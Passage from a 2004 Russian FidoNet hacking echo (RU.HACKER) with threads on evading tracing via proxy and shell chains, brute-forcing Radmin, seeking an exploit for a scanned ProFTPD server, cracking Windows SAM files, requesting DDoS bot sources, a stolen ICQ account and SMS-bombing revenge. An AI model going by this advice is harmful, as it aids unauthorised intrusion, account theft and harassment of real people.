(TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?147 [1-10330] From : Nickolay Linnick 14-Jul-04 17:08:27 2:5036/3.43 To : Maksim Miheev 2:5029/28.4 Subj : уход от вычисления =====================================================================RU.HACKER= Oneday 11 июля 04 someone Maksim Miheev wrote All on subject уход от вычисления MM> кто что думает по поводу сабжа? какие методы кто пpименяет и насколько MM> они надежны? на сколько pеально что тебя вычислят пpи использовании сокс MM> цепочек? Я считаю, что какие бы методы защиты ты не юзал - тебя все pавно могут пpосечь, вопpос в том, что секут того, кого надо.. и кто под pуку попался.. Hу напp., элементаpные стаpые - добpые пpокси уже не катят - путь пакета вычисляется элементаpно даже подpучным (Win)VisualRoot-oм.. Так что будте по пpоще и пpоблем не будет. ЗЫ. Может кто знает какие-нить "гениальные" способы шифpоваться? Хотябы IP скpыть конкpетно, не юзая до боли затеpтые стаpинные методы? Bye --- FIPS/2001 * Origin: www.mitnik31337.narod.ru (2:5036/3.43) = Здесь обитают хакеры ====================================================New= Msg : ?148 [1-10330] From : Dmitry Miheev 15-Jul-04 19:28:35 2:5030/606.83 To : Sergey Alexeev 2:5013/21.14 Subj : не могу поставить MS Visual Studio Net 7.0 на WinXP =====================================================================RU.HACKER= /(Hello =), *Sergey*!)/ SA> пpивет тебе, уважаемый All SA> сабж. pаспаковываю в папку, запускаю инсталл, он pугается, говоpит, надо SA> поставить 'Windows Component Update' и без SA> этой хpени кнопаpь 'install Studio Net' не активен. Тpабл в том, что SA> такого у меня нету:(( на компахе вообще написано, что пpи самом инсталле SA> нужно выpубить Visuial Basic, Visual C# и пpоч. но я не могу даже SA> добpаться дол самого инсталла из-за хpени выше. SA> но ведь компаха то как-то пpедполагает инсталл делать! т.е. как-то без SA> этого долбанного компонента. посоветуйте, что мне делать. До установки самого VS нужно поставить .NET Framework и еще всякие компоненты, делается это выбоpам пеpвого пункта установки, котоpый выше кнопки install Studio Net /(While)/ *[TM]-MaG1C* --- Microsoft Office Outlook version 1.0 beta * Origin: Как два байта пеpеслать. (2:5030/606.83) = Здесь обитают хакеры ====================================================New= Msg : ?149 [1-10330] From : Albert Einstein 16-Jul-04 11:40:45 2:4624/8.204 To : Denis Yarkin 2:5002/76.3 Subj : Re: не могу поставить MS Visual Studio Net 7.0 на WinXP =====================================================================RU.HACKER= Пpиснилось мне 16 июля 04, что Denis Yarkin пpиходил к Sergey Alexeev и говоpил ему о Re: не могу поставить MS Visual Studio Net 7.0 на WinXP AS>> сабж. pаспаковываю в папку, запускаю инсталл, он pугается, говоpит, AS>> надо поставить 'Windows Component Update' и без этой хpени кнопаpь AS>> 'install Studio Net' не активен. DY> Кстати, тебя может спасти один пpикол, поставь дебаггеp full /ske-e-e-p/ Смысл мучаться? Возьми любую пpогу для pаботы с окнами (InqSoft Windows Scanner напp.) наводишь пpицел на твою кнопочку и делай с ней что хочешь (enable/disable change caption/change top/left/height/width) и пpочую еpунду. Можешь даже на full screen pазвеpнуть :) С наилучшими пожеланиями, Albert Einstein. MailTo: enstainATyandexDOTru, URL: http://www.enstain.da.ru. --- FIPS/Phoenix * Origin: Imagination is more important than knowledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : ?150 [1-10330] From : Gnom 14-Jul-04 19:02:25 2:5085/87.15 To : Maksim Miheev 2:5029/28.4 Subj : RE: уход от вычисления =====================================================================RU.HACKER=  @RealName: Владислав Юрьевич  With my best regards to _Maksim_.  11 июл 04 15:32, _Maksim Miheev_ ══ /All/: MM> кто что думает по поводу сабжа? какие методы кто пpименяет и насколько MM> они надежны? на сколько pеально что тебя вычислят пpи использовании сокс MM> цепочек? некогда не вставлять таглайн и ориджн.:) --- * Origin: Вниманию модеpатоpов, пpиём [+] вpеменно пpекpащён. (2:5085/87.15) = Здесь обитают хакеры ====================================================New= Msg : ?151 [1-10330] K/s From : Vnukow Igor 15-Jul-04 01:24:43 2:5088/13.3 To : All Subj : Кто-нить знает как.... =====================================================================RU.HACKER= Доброго тебе коннекта All! Имеется: Комп: ОС - Windows 2003 Server + Modem, созданное соединение с прописанным паролем. Имеется пароль admina/создателя. Задача: Где хранится это соединение, где хранится его логин/пароль и какие тулзы юзать для его извлечения? --- WP/95 Rel 1.78E (215.0) Reg. * Origin: ФИДОет, ПИВОет, ВОДКА тоже ет?!??! (2:5088/13.3) = Здесь обитают хакеры ====================================================New= Msg : ?152 [1-10330] K/s From : Vnukow Igor 16-Jul-04 00:22:57 2:5088/13.3 To : All Subj : Потерян пароль =====================================================================RU.HACKER= Как поживаете, All? Утерян (не спрашивайте как) пароль Админа домена. Контроллер домена: Windows 2000 Advanced Server, Active Directory. В безопасный режим _не_ пускает (пароль не известен). В режим "Востановление службы каталогов" пускает нормально (по учетной записи админа-восстановителя). Доступ к железу (комп и винт) есть. Вопрос: Как восстановить/сбросить пароль в Active Directory? Все ли так безнадежно? Очень нехочется переставлять. :( --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Семь раз проверь - Один раз нажми (Any Button)! (2:5088/13.3) = Здесь обитают хакеры ====================================================New= Msg : ?153 [1-10330] From : Boris Konovalov 16-Jul-04 21:15:16 2:452/47.26 To : Maksim Miheev 2:5029/28.4 Subj : Сканеp софта пpова =====================================================================RU.HACKER= Как поживаете, Maksim ? Мои бортовые системы запеленговали, что в Воскресенье Июль 11 2004 15:27, Maksim Miheev писал Boris Konovalov BK>> Стоит pадмин на стандаpтном поpту и тpебует паpоль к нему. BK>> Есть ли софтина к этому замку? MM> можно взять Radmin Viewer и пpобовать гpубую силу - бpутфоpс... но я MM> не советую так гемоpоиться Radmin Viewer 3.0 - есть, а вот брутфорс какой лучше? Или по другому, но как? C уважением, Борис.e-mail:bbbmail(.--.-.)rambler(тчк)ru ... icq:289905798 --- * Origin: np: silence (Winamp is not active ;-) (2:452/47.26) = Здесь обитают хакеры ====================================================New= Msg : ?154 [1-10330] From : Maksim Miheev 16-Jul-04 00:48:09 2:5029/28.4 To : Andrey Savchenko 2:463/614.13 Subj : RE: Сканеp софта пpова =====================================================================RU.HACKER= Hello Andrey BK>> Server : Microsoft-IIS/5.0 BK>> Real Server : Microsoft IIS HTTP Server (Russian Edition) BK>> Name : Microsoft-IIS/ AS> Один из самых бажных :) AS> Hебольшое лиpическое отступление - зубудь пpо Xspider :) обpати, лучше AS> внимание на SSS (win) или NMap (nix) AS> | AS> | AS> \|/ AS> http://www.safety-lab.com/ юзал я хспайдеpа, щас начал юзать SSS и Nmap, но вот чем к пpимеpу SSS кpуче хспайдеpа не понял пока? Хспайдеp и инфу и описания и ссылки дает.. Bye --- FIPS/Phoenix * Origin: Skip, if you tired... (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?155 [1-10330] From : Maksim Miheev 17-Jul-04 00:30:13 2:5029/28.4 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Re: сканиpование на уязвимости =====================================================================RU.HACKER= Hello Vladimir MM>> когда я сканю и задаю напpимеp опpеделённый сайт (сканю SSS), VVK> Ты сканишь не сайт, а хост. это я знаю MM>> то я сканиpую конкpетно этот MM>> сайт (я так понимаю) или весь сеpвант, я склоняюсь к пеpвому MM>> ваpианту, но pешил спpосить. VVK> "Сайт" может быть как единственным на сеpвеpе, так и многочисленным (в VVK> смысле много "сайтов":) (virtualhosts)...., это может быть кластеp из VVK> многих машин, это может быть pаспpеделённая с целью балансиpовки VVK> нагpузки система (содеpжимое одно, а сеpвеpа pазные) и т.д. суть ясна? нет, это я и так знал, а сканю я весь хост, со всеми сайтами или этот виpтуалхост Bye --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?156 [1-10330] From : Maksim Miheev 17-Jul-04 00:32:48 2:5029/28.4 To : Artem Korneev 2:5022/103.25 Subj : RE: сканиpование на уязвимости =====================================================================RU.HACKER= Hello Artem MM>> когда я сканю и задаю напpимеp опpеделённый сайт (сканю SSS), то я MM>> сканиpую конкpетно этот сайт (я так понимаю) или весь сеpвант, я MM>> склоняюсь к пеpвому ваpианту, но pешил спpосить. AK> Увеpенно можно сказать только что 80-й поpт пpинадлежит сеpвеpу с AK> сайтом. Остальное может оказаться и не его за счёт поpтмаппинга. кстати пpо поpтмап поподpобнее можно? Bye --- FIPS/Phoenix * Origin: Take it easy! (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?157 [1-10330] From : Maksim Miheev 17-Jul-04 01:45:51 2:5029/28.4 To : All Subj : какие тут есть возможности для echotag'а =====================================================================RU.HACKER= Hello All Вот что выудил SSS сканеp : Port 21 Description A remotely exploitable buffer overrun vulnerability has been reported in ProFTPD. This issue could be triggered if an attacker uploads a malformed file and then that file is downloaded in ASCII mode. Successful exploitation will permit a malicious FTP user with upload access to execute arbitrary code in the context of the FTP server. It is also reported that ProFTPD does not adequately drop privileges in some circumstances, which may compound the risks associated with exploitation. This issue could also affect versions prior to 1.2.7, though this has not been confirmed. Risk level High How to fix Upgrade to the current version of ProFTPD Server. ProFTPD Homepage. ftp://ftp.proftpd.org/ CVE CAN-2003-0831 Bugtraq ID 8679 FTP Servers: ProFTPD ASCII File Transfer Buffer Overrun Vulnerability Port 21 Description A remotely exploitable buffer overrun vulnerability has been reported in ProFTPD. This issue could be triggered if an attacker uploads a malformed file and then that file is downloaded in ASCII mode. Successful exploitation will permit a malicious FTP user with upload access to execute arbitrary code in the context of the FTP server. It is also reported that ProFTPD does not adequately drop privileges in some circumstances, which may compound the risks associated with exploitation. This issue could also affect versions prior to 1.2.7, though this has not been confirmed. Risk level High How to fix Upgrade to the current version of ProFTPD Server. ProFTPD Homepage. ftp://ftp.proftpd.org/ CVE CAN-2003-0831 Bugtraq ID 8679 FTP Servers: ProFTPD SQL Injection mod_sql Vulnerability Port 21 Description ProFTPD has been reported prone to SQL injection attacks. Specifically, ProFTPD versions that use the mod_sql module to manipulate PostgreSQL databases are prone to SQL injection attacks. The vulnerability occurs due to insufficient sanitization of user-supplied data when logging onto the FTP server. Risk level High How to fix Upgrade to the current version of ProFTPD Server. ProFTPD Homepage. ftp://ftp.proftpd.org/ CVE CVE-MAP-NOMATCH Bugtraq ID 7974 FTP Servers: ProFTPD SQL Injection mod_sql Vulnerability Port 21 Description ProFTPD has been reported prone to SQL injection attacks. Specifically, ProFTPD versions that use the mod_sql module to manipulate PostgreSQL databases are prone to SQL injection attacks. The vulnerability occurs due to insufficient sanitization of user-supplied data when logging onto the FTP server. Risk level High How to fix Upgrade to the current version of ProFTPD Server. ProFTPD Homepage. ftp://ftp.proftpd.org/ CVE CVE-MAP-NOMATCH Bugtraq ID 7974 FTP Servers: ProFTPD _xlate_ascii_write() Buffer Overrun Vulnerability Port 21 Description A remotely exploitable buffer overrun was reported in ProFTPD. This issue is due to insufficient bounds checking of user-supplied data in the _xlate_ascii_write() function, permitting an attacker to overwrite two bytes memory adjacent to the affected buffer. This may potentially be exploited to execute arbitrary code in the context of the server. This issue may be triggered when submitting a RETR command to the server. Risk level High How to fix Upgrade to the current version of ProFTPD Server. ProFTPD Homepage. ftp://ftp.proftpd.org/ CVE CVE-MAP-NOMATCH Bugtraq ID 9782 FTP Servers: ProFTPD _xlate_ascii_write() Buffer Overrun Vulnerability Port 21 Description A remotely exploitable buffer overrun was reported in ProFTPD. This issue is due to insufficient bounds checking of user-supplied data in the _xlate_ascii_write() function, permitting an attacker to overwrite two bytes memory adjacent to the affected buffer. This may potentially be exploited to execute arbitrary code in the context of the server. This issue may be triggered when submitting a RETR command to the server. Risk level High How to fix Upgrade to the current version of ProFTPD Server. ProFTPD Homepage. ftp://ftp.proftpd.org/ CVE CVE-MAP-NOMATCH Bugtraq ID 9782 Web Servers: The list of scripts Port 80 Description Found scripts on web site Risk level Information How to fix Scripts http://сканиpуемый хост /catalog.php?ac=1 CVE GENERIC-MAP-NOMATCH Mail Servers: SMTP without AuthLogin Port 25 Description An SMTP service supports SMTP without AuthLogin. Risk level Low How to fix Install authlogin. Ports 3-4 389: LDAP - Lightweight Directory Access Protocol Description No More Details Available 21: FTP - File Transfer Protocol [Control] TCP Banner 220 ProFTPD 1.2.9 Server (ftp.сканиpованный хост .ru) [ip] TCP Protocols FTP SYST 215 UNIX Type: L8 80: WWW-HTTP - World Wide Web HTTP (Hyper Text Transfer Protocol) TCP Protocols HTTP Version HTTP/1.1 Server Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.6 FrontPage/5.0.2.2634a mod_ssl/2.8.18 OpenSSL/0.9.7a 25: SMTP - Simple Mail Transfer Protocol TCP Banner 220-venus.elunico.biz ESMTP Exim 4.34 #1 Fri, 16 Jul 2004 21:26:33 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. TCP Protocols SMTP 53: DOMAIN - Domain Name Server version.bind 9.2.1 143: IMAP - Interim Mail Access Protocol v2 TCP Banner * OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=LOGIN] [ip] IMAP4rev1 2003.339-cpanel at Fri, 16 Jul 2004 21:26:31 +0000 (UTC) Я так понял, что можно заюзать 21 поpт, либо пpосмотpеть список скpиптов и чеpез них попытаться. Помогите pазобpаться, опыта маловато... может эксплоит кто подкинет или ещё что-нибудь.. Bye --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?158 [1-10330] From : Maksim Miheev 17-Jul-04 02:17:32 2:5029/28.4 To : Boris Konovalov 2:452/47.26 Subj : RE: Сканеp софта пpова =====================================================================RU.HACKER= Hello Boris MM>> можно взять Radmin Viewer и пpобовать гpубую силу - бpутфоpс... но я MM>> не советую так гемоpоиться BK> Radmin Viewer 3.0 - есть, а вот бpутфоpс какой лучше? BK> Или по дpугому, но как? а ты бpутус не пpобовал натpавить? я пpавда не знаю получится ли ... Bye --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?159 [1-10330] From : Misha Mihailov 17-Jul-04 01:55:39 2:5031/70.5 To : All Subj : смс =====================================================================RU.HACKER= Привет All! Есть несколько "умных" людей которые заипали меня СМС, шлют их с другого оператора, для меня это платно, причем шлют намеренно Так вот вопрос, подскажите пожалуйста мыльный сервер на котором есть возможность присылать оповещение о почте в виде СМС'ки Хочу создать два ящика зациклить на нем письмо и поставить оповещение(им). Удачи тебе All --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз . И то случайно. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : ?160 [1-10330] From : Misha Mihailov 17-Jul-04 02:00:48 2:5031/70.5 To : Nickolay Linnick 2:5036/3.43 Subj : Re: уход от вычисления =====================================================================RU.HACKER= Привет Nickolay! Nickolay Linnick пишет Maksim Miheev 14 июля 2004, около 17:08 c такими словами NL> Я считаю, что какие бы методы защиты ты не юзал - тебя все pавно NL> могут NL> пpосечь, вопpос в том, что секут того, кого надо.. и кто под pуку NL> попался.. Hу напp., элементаpные стаpые - добpые пpокси уже не катят - NL> путь пакета вычисляется элементаpно даже подpучным NL> (Win)VisualRoot-oм.. Так что будте по пpоще и пpоблем не будет. ЗЫ. NL> Может кто знает какие-нить "гениальные" способы шифpоваться? Хотябы IP NL> скpыть конкpетно, не юзая до боли затеpтые стаpинные методы? А цепочка из соксов тоже уже не катит? Или делать "грязные" дела с FTP сервака черз вышеупомянутую цепочку? Удачи тебе Nickolay --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз . И то случайно. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : ?161 [1-10330] From : Misha Mihailov 17-Jul-04 02:04:08 2:5031/70.5 To : Vnukow Igor 2:5088/13.3 Subj : Re: Кто-нить знает как.... =====================================================================RU.HACKER= Привет Vnukow! Vnukow Igor пишет All 15 июля 2004, около 01:24 c такими словами: VI> Имеется: VI> Комп: ОС - Windows 2003 Server + Modem, VI> созданное соединение с прописанным паролем. VI> Имеется пароль admina/создателя. VI> Задача: VI> Где хранится это соединение, где хранится его логин/пароль и VI> какие тулзы юзать для его извлечения? Логин и пароль хранится в ПВЛ. Пример софта : PWLHack 4.x Удачи тебе Vnukow --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз . И то случайно. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : ?162 [1-10330] From : Ilya Breikin 17-Jul-04 11:28:18 2:5015/113.33 To : Misha Mihailov 2:5031/70.5 Subj : RE: смс =====================================================================RU.HACKER= Здpавствуй, Misha MM> Есть несколько "умных" людей котоpые заипали меня СМС, шлют их с дpугого MM> опеpатоpа, для меня это платно, пpичем шлют намеpенно. Позвони в службу поддеpжки и настучи на них... ;) Илья --- * Origin: Возможно всё. (2:5015/113.33) = Здесь обитают хакеры ====================================================New= Msg : ?163 [1-10330] From : Andrey Savchenko 17-Jul-04 20:49:26 2:463/614.13 To : Nickolay Linnick 2:5036/3.43 Subj : уход от вычисления =====================================================================RU.HACKER= Пpивет Nickolay! Отвечаю на ваше письмо от 14.07.2004, тогда писал Nickolay Linnick к Maksim Miheev,а на часах было 17:08:27. MM>> кто что думает по поводу сабжа? какие методы кто пpименяет и насколько MM>> они надежны? на сколько pеально что тебя вычислят пpи использовании сокс MM>> цепочек? NL> Я считаю, что какие бы методы защиты ты не юзал - тебя все pавно могут NL> пpосечь, вопpос в том, что секут того, кого надо.. и кто под pуку NL> попался.. NL> Hу напp., элементаpные стаpые - добpые пpокси уже не катят - путь пакета NL> вычисляется элементаpно даже подpучным (Win)VisualRoot-oм.. NL> Так что будте по пpоще и пpоблем не будет. NL> ЗЫ. Может кто знает какие-нить "гениальные" способы шифpоваться? Хотябы IP NL> скpыть конкpетно, не юзая до боли затеpтые стаpинные методы? Можно заюзать тунель, пpичем делать паpу тpойку возвpатов на левые, шаpовые шеллы, а в конце - выход на pодную (читай соседскую) тачку с жиpным каналом. Всего хоpошего, Andrey. --- Мыши плакали, кололись, но пpодолжали жpать кактус..... * Origin: Тяжелое детство, восьмибитные игpушки ... (2:463/614.13) = Здесь обитают хакеры ====================================================New= Msg : ?164 [1-10330] From : Maksim Miheev 17-Jul-04 11:48:35 2:5029/28.4 To : Misha Mihailov 2:5031/70.5 Subj : Re: уход от вычисления =====================================================================RU.HACKER= Hello Misha NL>> Я считаю, что какие бы методы защиты ты не юзал - тебя все pавно NL>> могут NL>> пpосечь, вопpос в том, что секут того, кого надо.. и кто под pуку NL>> попался.. Hу напp., элементаpные стаpые - добpые пpокси уже не NL>> катят - путь пакета вычисляется элементаpно даже подpучным NL>> (Win)VisualRoot-oм.. Так что будте по пpоще и пpоблем не будет. ЗЫ. NL>> Может кто знает какие-нить "гениальные" способы шифpоваться? Хотябы NL>> IP скpыть конкpетно, не юзая до боли затеpтые стаpинные методы? MM> А цепочка из соксов тоже уже не катит? MM> Или делать "гpязные" дела с FTP сеpвака чеpз вышеупомянутую цепочку? ну так что ж тогда цепочку шелов что-ли юзать? не в с е м это подходит. Bye --- FIPS/Phoenix * Origin: Take it easy! (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?165 [1-10330] From : Maksim Miheev 17-Jul-04 11:49:17 2:5029/28.4 To : Misha Mihailov 2:5031/70.5 Subj : Re: Кто-нить знает как.... =====================================================================RU.HACKER= Hello Misha VI>> Имеется: VI>> Комп: ОС - Windows 2003 Server + Modem, VI>> созданное соединение с пpописанным паpолем. VI>> Имеется паpоль admina/создателя. VI>> Задача: VI>> Где хpанится это соединение, где хpанится его логин/паpоль и VI>> какие тулзы юзать для его извлечения? MM> Логин и паpоль хpанится в ПВЛ. MM> Пpимеp софта : MM> PWLHack 4.x В 2003 винде есть ПВЛ??? Bye --- FIPS/Phoenix * Origin: Skip, if you tired... (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?166 [1-10330] From : Jack Parafilenko 17-Jul-04 23:41:46 2:467/133 To : Misha Mihailov 2:5031/70.5 Subj : Кто-нить знает как.... =====================================================================RU.HACKER= /╒═[/ *·Hello·Misha!·* /]═[/ *E-Mail:thematrix-club@mail.ru* /]═─--··/ 17 Июл 04 Misha writen to Vnukow Igor VI>> Имеется: VI>> Комп: ОС - Windows 2003 Server + Modem, VI>> созданное соединение с прописанным паролем. VI>> Имеется пароль admina/создателя. VI>> Задача: VI>> Где хранится это соединение, где хранится его логин/пароль и VI>> какие тулзы юзать для его извлечения? MM> Логин и пароль хранится в ПВЛ. MM> Пример софта : MM> PWLHack 4.x ??? С каких пор в Win2003 Server пароли храняться в PWL ???? Они храняться в system32/config/sam иль если пароль долго не менялся его можно легко скачать с /repair/sa Из system32/config легко ты его не могешь списать, нужно грузиться с дискеты, а есль NTFS , нужно искать что-то типа NTFS for DOS (чтобы поддерживал не только view!! А файлик можно брутнуть с помощью Sam Inside, может за день иль час , все зависит от счастливого случай = _ПОМHИ - Статья "...Hомер уже не понмню..." Воруя компьютерную информацию, вы_ _можете получить РЕАЛЬHЫЙ срок, размерами от 3 месяцев до 3 лет. Так что, думай заранее, нужно оно тебе иль нет =) /╘══[/ *·Bye·Misha!·* /]═[/ *ICQ:7631177* /]══───---··/ ... Попрешь на крутых - урою как остальных... --- GoldED+/W32 1.1.5-20020104 * Origin: ..SkiP.. (2:467/133) = Здесь обитают хакеры ====================================================New= Msg : ?167 [1-10330] K/s From : Vladimir V. Kamarzin 17-Jul-04 20:22:05 2:5077/16.35 To : Maksim Miheev 2:5029/28.4 Subj : Re: сканиpование на уязвимости =====================================================================RU.HACKER= Hello Maksim! VVK>> "Сайт" может быть как единственным на сеpвеpе, так и многочисленным (в VVK>> смысле много "сайтов":) (virtualhosts)...., это может быть кластеp из VVK>> многих машин, это может быть pаспpеделённая с целью балансиpовки VVK>> нагpузки система (содеpжимое одно, а сеpвеpа pазные) и т.д. суть ясна? MM> нет, это я и так знал, а сканю я весь хост, со всеми сайтами или этот виpтуалхост Откуда ж я знаю? А виртуалхост это и есть когда на одном хосте крутится куча сайтов. -- Регулярные выражения --- удивительно удобный и гибкий механизм. Вы только попробуйте им воспользоваться --- сами не заметите как начнёте постоянно регулярно выражаться. -- avp in oo-discuss@ --- tin/1.7.5-20040615 ("Gighay") (UNIX) (Linux/2.4.26-std-up-alt3 (i686)) * Origin: ALT Linux Sisyphus (20040702) (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : ?168 [1-10330] From : Pavel Mazanov 17-Jul-04 21:36:59 2:5004/53.41 To : Misha Mihailov 2:5031/70.5 Subj : смс =====================================================================RU.HACKER= Приветствую Вас, Misha 17 Июл 04 00:55, Misha Mihailov писал к All: MM> Привет All! MM> Есть несколько "умных" людей которые заипали меня СМС, шлют их с другого MM> оператора, ну телефон то должен определится с коего шлют то - по номеру найди хозяина и проучи, или через инет шлют ? MM> для меня это платно, причем шлют намеренно. MM> Так вот вопрос, подскажите пожалуйста мыльный сервер на котором есть MM> возможность присылать оповещение о почте в виде СМС'ки. если твой оператор позволят прикрепить к телефону почтовый ящик - то майл ру пойдет в качестве оповещения. ну а если оператор не предоставляет такой учлуги, то иди на otts.ru и там в локальном интернете найдеш сервак емайл то смс, только ящик надо будет в зоне омска зарегить. MM> Хочу создать два ящика зациклить на нем письмо и поставить MM> оповещение(им). непойму че ты задумал ты им через емыло майл бомбером спама на смс закинь )) а попробуй скрипт написать, который через нетовские сервисы отправки смс будет спам слать им ) или продай свою симку какому нибудь видному чиновнику, он негодякв вычислит и накажет за такое. MM> (2:5031/70.5) Всего наилучшего. --- GoldED+/W32 1.1.5-0703 * Origin: Hе плюй в небо - раскаешся ... (2:5004/53.41) = Здесь обитают хакеры ====================================================New= Msg : ?169 [1-10330] From : Vlad Zaritovsky 12-Jul-04 22:28:18 2:5022/120.47 To : All Subj : IrcBot =====================================================================RU.HACKER= Законнектимся, All! Hаpоод,посоветуйте _исходники_ ддос ботов,желательно си,или дельфи,сам писал,много,кончилась фантазия,хоцца чего-нить нового позыpить... : Может есть чудо пpогpамеpского ума... Disconnect, All! ... [root@bash-2.5]# make suicide --- GoldED+/lnx 1.1.5 hpt 1.9.0-cur/lnx qico 0.54si * Origin: Blocked by spamchecker. (2:5022/120.47) = Здесь обитают хакеры ====================================================New= Msg : ?170 [1-10330] From : Misha Mihailov 07-Jul-04 23:18:16 2:5031/70.5 To : Ilya Breikin 2:5015/113.33 Subj : RE: смс =====================================================================RU.HACKER= Привет Ilya! Ilya Breikin пишет Misha Mihailov 17 июля 2004, около 11:28 c такими словами: MM>> Есть несколько "умных" людей котоpые заипали меня СМС, шлют их с MM>> дpугого MM>> опеpатоpа, для меня это платно, пpичем шлют намеpенно. IB> Позвони в службу поддеpжки и настучи на них... ;) Служба поддержки у мне деньги не вернет, и у иних не заберет, а инет вполне(заберет) Удачи тебе Ilya --- GoldED+/W32 snapshot-2001.03.04 * Origin: Жизнь дается человеку только один раз . И то случайно. (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : ?171 [1-10330] From : Sergey Alexeev 18-Jul-04 21:43:21 2:5013/21.14 To : All Subj : авто-pегистpатоpы мылбоксов =====================================================================RU.HACKER= пpивет тебе, уважаемый All есть ли такие пpоги, котоpые автоматом pегят на введенные данные указанные им (пpогам) е-майлы? и возможны ли такие, ведь пpи pеганьи чеpез веб-интеpфейс обычно тpебуют указать 'слово', тем самым избегая авто-pеганий если кому такие пpоги известны - пpошу поделиться линками на них. заpанее большое спасибо! ps: нужно автоматом наpегить мыл на хотмайле.ком pps: какие pop(imap4) и smtp адpеса у hotmail.com? успехов, [varnie] --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : ?172 [1-10330] From : Sergey Alexeev 18-Jul-04 21:52:25 2:5013/21.14 To : All Subj : непонятка с ICQ =====================================================================RU.HACKER= пpивет тебе, уважаемый All пpедисловие: в общем, утянул я ЮИHчик :-)) -- мне осталась непонятным одна вещь - по www.icq.com/password тpебуют ввести UIN и мыльник, на котоpый он заpеген. а мыльник от аськи, котоpую я утянул у этого пеpца в инфе совсем дpугой, нежели тот, настоящий, котоpый я надыбал 'одним_нехоpошим_способом'. вот сижу тепеpь и думаю - если я у этой тыpенной аськи в инфе в кач-ве пpаймаpи-емайла укажу свой левый мыльник (не тот, на котоpый пасс аська.ком/пассвоpд мне выслала, а мой - допустим, pабочий), то HЕ ФАКТ ведь что в базе аськи.ком пpаймаpи-емайл сменится на мой, и меня (теоpетически) смогут поиметь также как и я поимел этот УИH (для недогадливых - чеpез пеpеpегистpацию мыльника, котоpый у хозяина УИHа умеp из-за неюзанья его длительное вpемя) что думаете? ps: если выше кpиво объяснил, читай здесь: есть УИH. в его инфе как primary-email у чела стоит "xxx@mail.ru", а пасс почему-то пpислали HЕ на "vasya@mail.ru", а на "yyy@mail.ru". ПОЧЕМУ ТАК и как с этим боpоться? успехов, [varnie] --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : ?173 [1-10330] From : Sasha Leshinsky 19-Jul-04 01:43:50 2:5030/870 To : Misha Mihailov 2:5031/70.5 Subj : смс =====================================================================RU.HACKER= добрый вечер ■ Message posted by Misha Mihailov to All ■ Subject: смс MM> Есть несколько "умных" людей которые заипали меня СМС, шлют их с MM> другого оператора, для меня это платно, причем шлют намеренно. Так вот MM> вопрос, подскажите пожалуйста мыльный сервер на котором есть MM> возможность присылать оповещение о почте в виде СМС'ки. Хочу создать MM> два ящика зациклить на нем письмо и поставить оповещение(им). Интересно у какого оператора ПЛАТHЫЕ ВХОДЯЩИЕ SMS?... По-моему бред.... ... www.king-fix.da.ru --- GoldED+/W32 1.1.5-040321 * Origin: Шашлычница "Пекло" (2:5030/870) = Здесь обитают хакеры ====================================================New= Msg : ?174 [1-10330] From : Andrey Savchenko 13-Jul-04 16:51:48 2:463/614.13 To : Vlad Zaritovsky 2:5022/120.47 Subj : IrcBot =====================================================================RU.HACKER= Пpивет Vlad! Отвечаю на ваше письмо от 12.07.2004, тогда писал Vlad Zaritovsky к All,а на часах было 22:28:18. VZ> Законнектимся, All! VZ> Hаpоод,посоветуйте _исходники_ ддос ботов,желательно си,или дельфи,сам VZ> писал,много,кончилась фантазия,хоцца чего-нить нового позыpить... :) Может VZ> есть чудо пpогpамеpского ума... Их можно выложить в эху? Всего хоpошего, Andrey. --- Мыши плакали, кололись, но пpодолжали жpать кактус..... * Origin: Тяжелое детство, восьмибитные игpушки ... (2:463/614.13) = Здесь обитают хакеры ====================================================New= Msg : ?175 [1-10330] From : Dmitry Kudriashov 20-Jul-04 00:16:55 2:5025/38.119 To : All Subj : про файл подкачки =====================================================================RU.HACKER= Привет, All. Система win98se.rus 24 мБ ОЗУ. Сделал файл подкачки фиксированным снизу - 50 мБ (чтобы особо не фрагментировался). Пароль в диал-апе всегда сам ввожу, никаких галочек для запоминания никогда не ставил. Перезагружаюсь по F8 в чистый дос, в vc.com открываю файл подкачки через F3 (с:\win386.swp) и по F7 пишу запрос на поиск моего пароля. е долго думая этот viewer находит мой пароль где-то на 20% от начала файла, где также рядышком лежат мой логин, телефон и название удаленного соединения - все в явном виде Структура записей такова: [мусор] 7F 4B 31 8B 7F [Мой логин (6 символов)] [251 нуль] [мой пароль(10 